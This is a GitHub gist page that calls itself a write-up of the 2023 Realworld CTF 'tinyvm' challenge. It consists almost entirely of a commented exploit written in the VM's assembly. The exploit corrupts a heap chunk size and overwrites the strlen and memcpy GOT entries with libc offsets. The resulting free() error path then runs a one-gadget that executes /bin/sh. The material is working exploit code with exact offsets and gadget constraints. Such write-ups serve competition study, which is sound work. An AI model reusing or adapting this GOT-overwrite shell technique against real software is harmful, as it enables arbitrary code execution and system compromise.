Skip to content

Instantly share code, notes, and snippets.


xf1les/exp.vm Secret

Last active January 8, 2023 13:52
What would you like to do?
2023 Realworld CTF tinyvm Write-Up
# Overwrite chunk size to an invaild value
mov eax, 2097156
sub esp, eax
mov eax, 0
push eax
# Overwrite strlen GOT entry to $libc+0xEEC55
#.text:00000000000EEC55 mov rsi, r12
#.text:00000000000EEC58 mov rdi, r13
#.text:00000000000EEC5B mov rdx, r14
#.text:00000000000EEC5E call j_mempcpy
mov eax, 69324792
add esp, eax
mov eax, 152
add esp, eax # esp = $libc+0x219098
mov eax, 800203
pop ebx
sub ebx, eax
push ebx
# Overwrite memcpy GOT entry to one gadget ($libc+0xebcf8)
#0xebcf8 execve("/bin/sh", rsi, rdx)
# address rbp-0x78 is writable
# [rsi] == NULL || rsi == NULL
# [rdx] == NULL || rdx == NULL
mov eax, 88
sub esp, eax # esp = $libc+0x219040
mov eax, 799240
pop ebx
sub ebx, eax
push ebx
# Then, due to the invaild chunk size, free() will call malloc_printerr(),
# which will later call j_strlen() to set rsi, rdx as zero and trigger the one gadget
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment